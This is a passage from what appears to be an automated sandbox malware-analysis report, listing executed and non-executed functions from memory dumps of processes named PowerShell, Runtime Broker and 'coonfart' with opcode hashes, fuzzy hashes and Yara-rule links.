                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945e35f077693c62dddf1778542edc4e71868b51b1c7a01d2940b2af5a08f134
                                  • Instruction ID: b6a95ea55ed06f27275bb598b24541c2986b634de5eef2b424fa1fe011aecc7f
                                  • Opcode Fuzzy Hash: 945e35f077693c62dddf1778542edc4e71868b51b1c7a01d2940b2af5a08f134
                                  • Instruction Fuzzy Hash: F0511536B096954FD308FB6CA4B09E93BA0EF8922D76806BBE49CCF2D7CD245445CB50
                                  Function 00007FFD9BAA0650 Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.1963350845.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d865eb2c573532d7b1df206297e8eeebf0a4d691fdb66e11972a912c7cb6f88
                                  • Instruction ID: 2cba9b2197df2ee9244a649355ca35ee680dfb96518e920beb38e6b8313c93e8
                                  • Opcode Fuzzy Hash: 6d865eb2c573532d7b1df206297e8eeebf0a4d691fdb66e11972a912c7cb6f88
                                  • Instruction Fuzzy Hash: 9F31D521B18A480FE798EB6C9879679B6C2EFD8311F0505BEF00EC72D7DD649C428341
                                  Function 00007FFD9BAA0CE9 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.1963350845.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a903cd7910df7dc94439b56835c52bb6c10db44dedc4e47b3f9108ba66ddf4a0
                                  • Instruction ID: 73c4aa22f671730bc510fe4c6355f00e5c10a5dcfac11fbf9130a7e8560e0c25
                                  • Opcode Fuzzy Hash: a903cd7910df7dc94439b56835c52bb6c10db44dedc4e47b3f9108ba66ddf4a0
                                  • Instruction Fuzzy Hash: D8310922B19A090FE794BBBC5C297BC76C2EF98721F0402BAF01DC71D6DD286C428391
                                  Function 00007FFD9BAA2311 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.1963350845.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cdd482a14fd5706af3fbb0d8acf1dcb0e05f696c5007708caaba651c04abe69a
                                  • Instruction ID: ef215ec50521615bc79ac56581dd76d0767fcf945df483ec9f60b5550d2b73e7
                                  • Opcode Fuzzy Hash: cdd482a14fd5706af3fbb0d8acf1dcb0e05f696c5007708caaba651c04abe69a
                                  • Instruction Fuzzy Hash: FD01F711A0EBC50FE761B7A85965535BFE1DFA6211B0905FBE8C8C61E7DC88AA408372

                                  Executed Functions

                                  Function 00007FFD9BBA6605 Relevance: 1.7, Strings: 1, Instructions: 436COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2132281460.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bba0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: X7z?
                                  • API String ID: 0-1836037893
                                  • Opcode ID: 72f688128f798f9fc7f5661f2847ae25aa87b33c92de84f8a438c5cfddf083df
                                  • Instruction ID: 94aa2f2e14a278da586c3d7d88476053a8923411822ff9025d571bacd32ca17c
                                  • Opcode Fuzzy Hash: 72f688128f798f9fc7f5661f2847ae25aa87b33c92de84f8a438c5cfddf083df
                                  • Instruction Fuzzy Hash: F0D127B2E0EA8E0FEBA5A76848655B57BE1FF16318B0901FFD45EC70E3D918A905C341
                                  Function 00007FFD9BAD6435 Relevance: .7, Instructions: 700COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2131164324.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f8c5de98863e83b495a75ac27d4b96611a3e37f96f8640466cedc85b83612371
                                  • Instruction ID: 3148fe91c5cd4cfc5a91eb3cdb6838d60a29940a989cdf8fa938c56cc1bfbc52
                                  • Opcode Fuzzy Hash: f8c5de98863e83b495a75ac27d4b96611a3e37f96f8640466cedc85b83612371
                                  • Instruction Fuzzy Hash: CDD17F31A18A4D8FDF98DF9CC465AAD77F1FFA8300F15426AD409D7296CA74E881CB81
                                  Function 00007FFD9BAD9EF2 Relevance: .2, Instructions: 238COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2131164324.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4135a8cfd3f25622a841f2901dcb5d415f4694af2cac8333520d68d39b906f7d
                                  • Instruction ID: 2145845530d27473a372eb3009416ffaf7d195efbab351da01034e300567bcf8
                                  • Opcode Fuzzy Hash: 4135a8cfd3f25622a841f2901dcb5d415f4694af2cac8333520d68d39b906f7d
                                  • Instruction Fuzzy Hash: E4710B63A0E6DA1FE7129B6C98B54D53F60EF5222DB0D42F7D8D88F093ED446609C352
                                  Function 00007FFD9BAD9738 Relevance: .2, Instructions: 156COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2131164324.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 662b593a4dffbe21f139841de9a2f88005468831f9a97611930a003f9033fef5
                                  • Instruction ID: 01be84195a8ee3fbc09e330be2db55aa0596d14a6f1043b3e6d5c3a9c908c072
                                  • Opcode Fuzzy Hash: 662b593a4dffbe21f139841de9a2f88005468831f9a97611930a003f9033fef5
                                  • Instruction Fuzzy Hash: ED412B72A0EB8C4FEB589F5C5C1A6E9BBE0FB94310F50427FE04883252DA60F91587C2
                                  Function 00007FFD9BAD9885 Relevance: .1, Instructions: 146COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2131164324.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5bab276d5961cd09b1710fbbe4fed1fb46151764652ac0ec2c1ab5f066e94544
                                  • Instruction ID: 2c3a6288af562a036897aab4e8de3aa65dbf743f2e9a6cb27aaef88774638124
                                  • Opcode Fuzzy Hash: 5bab276d5961cd09b1710fbbe4fed1fb46151764652ac0ec2c1ab5f066e94544
                                  • Instruction Fuzzy Hash: E941F931A0CB484FD72C9B9CA84A6F8BBE0EB95331F00426FD04983592CB75B416CBC6
                                  Function 00007FFD9BAD9FE0 Relevance: .1, Instructions: 142COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2131164324.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b39dfd97146b5b6f9db925875baf375839c0725e1b1ca0f29c49fe9030a7d0a
                                  • Instruction ID: 60f9f46029f3e9ce879d098cec6ad4c311d5f55e2c685aba7a6746fa8837dad8
                                  • Opcode Fuzzy Hash: 9b39dfd97146b5b6f9db925875baf375839c0725e1b1ca0f29c49fe9030a7d0a
                                  • Instruction Fuzzy Hash: 77412753A0F6CA1FD722AB7858754E53F90DF52219B0D42FBD4E88F0A3D9486509C362
                                  Function 00007FFD9B9BEE20 Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2129982285.00007FFD9B9BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9BD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9b9bd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f935fca211e5f6656f40d129f3c206a036c06b88b3b4887f82711d369c9cd57
                                  • Instruction ID: d45ab3d412d3eea7c41a9e81aec3b3ab46e2e5703ed471d237074dc45d1790f7
                                  • Opcode Fuzzy Hash: 5f935fca211e5f6656f40d129f3c206a036c06b88b3b4887f82711d369c9cd57
                                  • Instruction Fuzzy Hash: D041297140EFC45FD7969B3998519523FF0EF57320B1609EFD088CB1A3D625A846CB92
                                  Function 00007FFD9BADA750 Relevance: .1, Instructions: 109COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2131164324.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e5b6413f028a3e61f65fa40f5febd19aa266c824c8e23ebeb5b9cc8067228aad
                                  • Instruction ID: 876b3e1920d9e2d7f5171c7a125b1a2b626db6399d0aa733999c68f0edb72073
                                  • Opcode Fuzzy Hash: e5b6413f028a3e61f65fa40f5febd19aa266c824c8e23ebeb5b9cc8067228aad
                                  • Instruction Fuzzy Hash: 4B310531A0DB4C8FDB58DB9CC8496E97BE0EBA6320F04416FD049C3162D674980ACB91
                                  Function 00007FFD9BAD33B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2131164324.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                  • Instruction ID: c6d341720b75168737bcbbb658bbc6ed62dea96e630f77678b5119a0e236c73e
                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                  • Instruction Fuzzy Hash: EF01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10066DE58AC76A5DA36E882CB45
                                  Function 00007FFD9BBA414D Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2132281460.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bba0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 880c924df4c57218b173242feb30aebd111f6bd87284b29f498435c9cb28245c
                                  • Instruction ID: c4281123ea0a5b0ddf7cd605975f9f3fa510373dc13c3cb25814738d920db8d1
                                  • Opcode Fuzzy Hash: 880c924df4c57218b173242feb30aebd111f6bd87284b29f498435c9cb28245c
                                  • Instruction Fuzzy Hash: 14F0BE32B0E5098FD769EA4CE4528A87BE0FF5532471200BAE16DC71F3CA25EC40CB41
                                  Function 00007FFD9BBA4400 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2132281460.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bba0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3feedd1cf549ed9e603061348b8442df0d317f6c1cad636896c0e3bd50853a98
                                  • Instruction ID: e0986911481f9d9a75a452c0a528930737d4ccd60b12bd572b891a7bc627e875
                                  • Opcode Fuzzy Hash: 3feedd1cf549ed9e603061348b8442df0d317f6c1cad636896c0e3bd50853a98
                                  • Instruction Fuzzy Hash: 30F0BE32A0E5498FD768EA4CE0618A873E0FF4532471200BAE15DC70A3CE25AC40C740
                                  Function 00007FFD9BBA41D1 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2132281460.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bba0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction ID: fdcde502d3a89db43466c761a0ed7cac2940823bd74c0760f1580f01370addfb
                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction Fuzzy Hash: 48E01A31B0C8088FDA78DA4CE0519A97BE1FBA832571201BBD14EC75B1CA32ED518B80

                                  Non-executed Functions

                                  Function 00007FFD9BAD8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2131164324.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: K_^4$K_^7$K_^F$K_^J
                                  • API String ID: 0-377281160
                                  • Opcode ID: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                  • Instruction ID: 689fd8cd61abe592697ee0e81be52994a8d18c1a10a85d92d64fbc034fb2e5fd
                                  • Opcode Fuzzy Hash: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                  • Instruction Fuzzy Hash: 6F2104B77085265ED715BB7CAC149D93BA0CFA827E34503F3E0A9CF093E9146086CAD0

                                  Executed Functions

                                  Function 00007FFD9BB96605 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2375715692.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bb90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: X7h7
                                  • API String ID: 0-457199588
                                  • Opcode ID: 828ff7593f454443592f76b1c20b6e08558cfbd6aa810325f1d3f1f5668e4395
                                  • Instruction ID: 61b004bc6af7938ef67eb6865d0368bd1f5d3f117e654b0c03dc0f833c2a15bd
                                  • Opcode Fuzzy Hash: 828ff7593f454443592f76b1c20b6e08558cfbd6aa810325f1d3f1f5668e4395
                                  • Instruction Fuzzy Hash: EFD13631B0EA8E0FEBA5AB6888755B57B91FF5639CB0901BFD45EC70E7D918A801C341
                                  Function 00007FFD9BAC644D Relevance: .7, Instructions: 694COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2374221845.00007FFD9BAC5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC5000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bac5000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de6c7a6f17ffdb00ec2c6c29abb304aa9bd2aeb82c6a410e35b3e55f177af018
                                  • Instruction ID: 9d92c25bff0d917fb9dc141270f9c8e2dfe601a730adc8295e06cdc6368d617c
                                  • Opcode Fuzzy Hash: de6c7a6f17ffdb00ec2c6c29abb304aa9bd2aeb82c6a410e35b3e55f177af018
                                  • Instruction Fuzzy Hash: FED15131A18A4D8FDF98EF5CC455ABDB7E1FF68300F15416AD409D72A6CA74E841CB81
                                  Function 00007FFD9BACA0E0 Relevance: .3, Instructions: 257COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2374221845.00007FFD9BAC5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC5000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bac5000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61f482824c351a07af8d892496991be98fbbe2e0e65daa97f6f70084653c9488
                                  • Instruction ID: a8e8589ed14c4fa0cb92b889eb4e04c2de525fc104caa0b73463a4d45b3cf2d5
                                  • Opcode Fuzzy Hash: 61f482824c351a07af8d892496991be98fbbe2e0e65daa97f6f70084653c9488
                                  • Instruction Fuzzy Hash: 3111722190E7C94FD723AB6898754E43FB09F13229B0901F7D498CF0A7D9585848C7A2
                                  Function 00007FFD9BAC9D4B Relevance: .2, Instructions: 223COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2374221845.00007FFD9BAC5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC5000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bac5000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 43cc7f26a9b2e26847b5284759b712e7026612a0568cab8f09b9244453b2f489
                                  • Instruction ID: 0bd1d9f10e3394f99ac4f0aabba6830b6a1b3cdd91373aa94821dca6c6ee0967
                                  • Opcode Fuzzy Hash: 43cc7f26a9b2e26847b5284759b712e7026612a0568cab8f09b9244453b2f489
                                  • Instruction Fuzzy Hash: 86F0FC7190D6CC8FDB52EF1888291B47FE0FF26300B0500EBD848C7175DA519A44C7C2
                                  Function 00007FFD9BAC9750 Relevance: .1, Instructions: 145COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2374221845.00007FFD9BAC5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC5000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bac5000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3780515c7bb6cc68743111de29054ddafd3d7f64c6fff763e135c0b30954bf86
                                  • Instruction ID: a0cf4594c490136601ceb3eaf75bba5fa3fb8c0319524b2aef41f26977be6708
                                  • Opcode Fuzzy Hash: 3780515c7bb6cc68743111de29054ddafd3d7f64c6fff763e135c0b30954bf86
                                  • Instruction Fuzzy Hash: 7341277190DB884FDB199F5C9C0A6B97BE0FB56310F04416FE08993293CA60A816CBC6
                                  Function 00007FFD9B9AED40 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2372740910.00007FFD9B9AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9AD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9b9ad000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21ebaaca6956c7167144405a3f32350aaafd9b517e3645fc6cc1ed76625ccc68
                                  • Instruction ID: 7b06a924b5e3112435a348f6b521eb050acdafa25655a2e4e6b6ef1d79fef336
                                  • Opcode Fuzzy Hash: 21ebaaca6956c7167144405a3f32350aaafd9b517e3645fc6cc1ed76625ccc68
                                  • Instruction Fuzzy Hash: 4C41173041EFC45FE7569B68D8559523FF0EF57320B2A05DFD088CB1A3D629A846C7A2
                                  Function 00007FFD9BACA7C6 Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2374221845.00007FFD9BAC5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC5000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bac5000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64934766bf9f924f9d1ec631a513a3a877b40c82aafffe13136fdc4ecdf3722b
                                  • Instruction ID: 5b792c62c2f3c96eceb0e352cc332fb3b5e49a1ef1b6293baeb6dbba399f9235
                                  • Opcode Fuzzy Hash: 64934766bf9f924f9d1ec631a513a3a877b40c82aafffe13136fdc4ecdf3722b
                                  • Instruction Fuzzy Hash: 5A21E131A0CA4C8FEB58DBACD84A7F97BE0EB95321F04816FD049C7156DA74A41ACB91
                                  Function 00007FFD9BAC33B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2374221845.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction ID: ee59faf03481a4826278b3042e26341a3348b81f49576dea66fea955f9f1e53b
                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction Fuzzy Hash: 5801447121CB0C4FD748EF0CE451AA5B7E0FB95364F10066DE58AC76A5DA36E882CB45
                                  Function 00007FFD9BB9414D Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2375715692.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bb90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b78959de49ccf6896cddb7ec6a8549ae51cf37baad366c80eb6117c299c06414
                                  • Instruction ID: 7ec17db321616b60628b20343e18c63532d3b21a58f5004d10681f98805d8988
                                  • Opcode Fuzzy Hash: b78959de49ccf6896cddb7ec6a8549ae51cf37baad366c80eb6117c299c06414
                                  • Instruction Fuzzy Hash: 1CF09A32B0E5098FD769EB4CE4528A877E0FF5532871200BAE16DC71B3CA25EC418B40
                                  Function 00007FFD9BB94400 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2375715692.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bb90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c00d147c1f709dff4711e075c9fe9e5a420bde3d10a22de3a00333d781f714b8
                                  • Instruction ID: fb3d2e467fc44215632023526b2516827e14ef3e11db80c3b427186f4c2b64db
                                  • Opcode Fuzzy Hash: c00d147c1f709dff4711e075c9fe9e5a420bde3d10a22de3a00333d781f714b8
                                  • Instruction Fuzzy Hash: A6F0BE32B0E5498FDB68EA4CE0618A873E0FF0532870200BAE15DC71A3DA25AC40C750
                                  Function 00007FFD9BB941D1 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2375715692.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bb90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction ID: ccd41cf97bc1051b6dfc5ab65743c2271d9af8b0340f2b08a26d56b09f0b59f9
                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction Fuzzy Hash: 9AE01A31B0C8188FDA78DB4CE0519A977E1FB9832971201BBD14EC76B1CA32ED518B80

                                  Non-executed Functions

                                  Function 00007FFD9BAC8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.2374221845.00007FFD9BAC5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC5000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_7ffd9bac5000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                  • API String ID: 0-1415242001
                                  • Opcode ID: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
                                  • Instruction ID: 336ad1cbfe1c429cbbc3a2013bd376653ffc9a4cad362ec817ae2c65b74884c1
                                  • Opcode Fuzzy Hash: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
                                  • Instruction Fuzzy Hash: BD21F5737045154AC31576ADBC519ED6780DF6837E34552F3F628CF153DB24A48BCA80

                                  Executed Functions

                                  Function 00007FFD9BAD16D9 Relevance: .8, Instructions: 812COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.2440508470.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_7ffd9bad0000_Runtime Broker.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44e5c5c73bc72e706c4fa4604de8e19ce976b8224db4ef4eba1985a9ecdd344a
                                  • Instruction ID: 6dce3327283baa4fe87b5987625182f33c055d80400331eecbc257a07474fccf
                                  • Opcode Fuzzy Hash: 44e5c5c73bc72e706c4fa4604de8e19ce976b8224db4ef4eba1985a9ecdd344a
                                  • Instruction Fuzzy Hash: 1842D420B29A494FE768FB7888757B977D2FFD8316F440679E04DC32DADE68A8018741
                                  Function 00007FFD9BAD2141 Relevance: .2, Instructions: 210COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.2440508470.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_7ffd9bad0000_Runtime Broker.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77079ffa64cec5d9981bf0e57fe127b981f7ab24742ce6ab38b91e8344bfedcc
                                  • Instruction ID: 738bac185df6b139f0d89fd487ec3715615aa70664e2bfb39382509c450473c1
                                  • Opcode Fuzzy Hash: 77079ffa64cec5d9981bf0e57fe127b981f7ab24742ce6ab38b91e8344bfedcc
                                  • Instruction Fuzzy Hash: 8251FD20B1E6C94FD796ABB88834675BFE4DF87225B0806FBF099C61E7DD481846C342
                                  Function 00007FFD9BAD1255 Relevance: .5, Instructions: 466COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.2440508470.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_7ffd9bad0000_Runtime Broker.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
